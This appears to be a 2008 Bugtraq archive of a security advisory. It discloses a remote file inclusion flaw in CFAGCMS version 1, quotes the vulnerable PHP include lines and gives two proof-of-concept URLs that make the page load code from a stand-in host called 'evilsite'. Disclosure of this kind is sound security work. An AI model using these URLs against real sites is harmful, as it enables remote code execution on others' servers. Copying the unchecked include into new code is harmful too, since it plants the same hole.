Bugtraq mailing list archives
CFAGCMS Remote File Inclusion
From: admin () bugreport ir
Date: Sun, 14 Dec 2008 10:34:13 +0330
########################## www.BugReport.ir ######################### # # AmnPardaz Security Research Team # # Title: CFAGCMS Remote File Inclusion # Vendor: http://sourceforge.net/projects/cfagcms/ # Bug: Remote File Inclusion # Vulnerable Version: 1 # Exploitation: Remote with browser # Fix: N/A # Original Advisory: http://www.bugreport.ir/index_58.htm ################################################################### #################### - Description: ####################CFAGCMS is a gaming cms for gaming website like GameSpot, GameSpy and others. It's using php and mysql.
#################### - Vulnerability: #################### +--> File InclusionWhen register_globals is enabled, Its possible to include arbitrary files from local or remote resources.
####################
- Code Snippet:
####################
themes/default/index.php #line:14-17
<div id="twocols" class="clearfix">
<div id="maincol" >maincol<?php include($main);?></div>
<div id="rightcol" >right col<?php include($right);?></div>
</div>
####################
- Exploits/POCs:
####################
POC: http://[URL]/cfagcms/themes/default/index.php?main=http://evilsite
POC: http://[URL]/cfagcms/themes/default/index.php?right=http://evilsite
####################
- Credit :
####################
AmnPardaz Security Research & Penetration Testing Group
Contact: admin[4t}bugreport{d0t]ir
www.BugReport.ir
www.AmnPardaz.com
Current thread:
- CFAGCMS Remote File Inclusion admin (Dec 15)